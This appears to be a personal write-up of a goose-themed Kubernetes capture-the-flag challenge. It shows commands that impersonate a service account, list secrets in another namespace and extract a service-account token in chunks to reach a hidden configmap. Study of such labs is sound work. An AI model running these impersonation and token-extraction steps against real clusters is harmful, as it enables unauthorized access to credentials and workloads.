March 21, 2020
What namespaces exist?
!honkctl get ns
default Active 84s
garden Active 61s
home Active 61s
kube-node-lease Active 85s
kube-public Active 85s
kube-system Active 85s
local-path-storage Active 75s
mod
Do any custom resources exist?
!honkctl get crds
NAME TODO
todo-1 Steal the groundskeepers keys.
todo-2 Get to the Pub.
todo-3 Get into the model-village.
todo-4 Steal the beautiful minature golden bell.
todo-5 ...and take it all the way back home.
Looks like the game is here.
Describing the first todo:
!honkctl describe todo todo-1
The hints are part of the spec:
!honkctl get todo todo-1 -o=jsonpath='{.spec.hint}'
Assume the groundskeeper and get into the pub
namespace
!honkctl get pods --as system:serviceaccount:garden:groundskeeper -n pub
The pods have service accounts!
!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range .items[*]}{.metadata.name}{"|"}{end}'
Empty the pub's pockets (aka, get their service accounts):
!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range.items[*]}{.metadata.name}{"|"}{end}'
Get the token, to run the !honkctl --token=<TOKEN>
A burly man can be somewhat grizzly. To get the burly-man
token, we first get the secret name for the serviceAccount
secret. When the exfiltrate the base64 token value for that secret.
The honkctl
slack app only shows around 250 characters, and a service token defaults to about 1200.
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c1-250
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c251-500
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c501-750
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c751-1000
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c1001-1250
Taking a look around, there's only a configmmap with the name bell
...which is exactly what we were looking for
!honkctl --token $TOKEN get cm bell -n model-village -o json
The configmap data reveals a pod object.
!honkctl --token $TOKEN get cm bell -n model-village -o jsonpath={".data.bell\\.yaml"}
apiVersion: v1
kind: Pod
metadata:
name: bell
namespace: home
annotations:
description: "A beautiful golden bell."
labels:
beautiful: 'true'
spec:
containers:
- name: bell
image: mrbobbytables/bell:latest
ports:
- containerPort: 80
The challenge seems to be to get this container to run in the home
namespace.
I've tried to
- copy the configmap to any namespace
!honkctl --token $TOKEN get cm bell -n model-village -o yaml | kubectl --token $TOKEN -n home apply -f -
- apply the pod spec to the
home
namespace
!honkctl --token $TOKEN get cm --export bell -n model-village -o jsonpath={".data.bell\\.yaml"} | kubectl --token $TOKEN apply -f -
I don't really know how to create anything in that namespace.
full solution has been posted: https://github.com/honk-ci/honkctl/tree/master/challenges/2020-march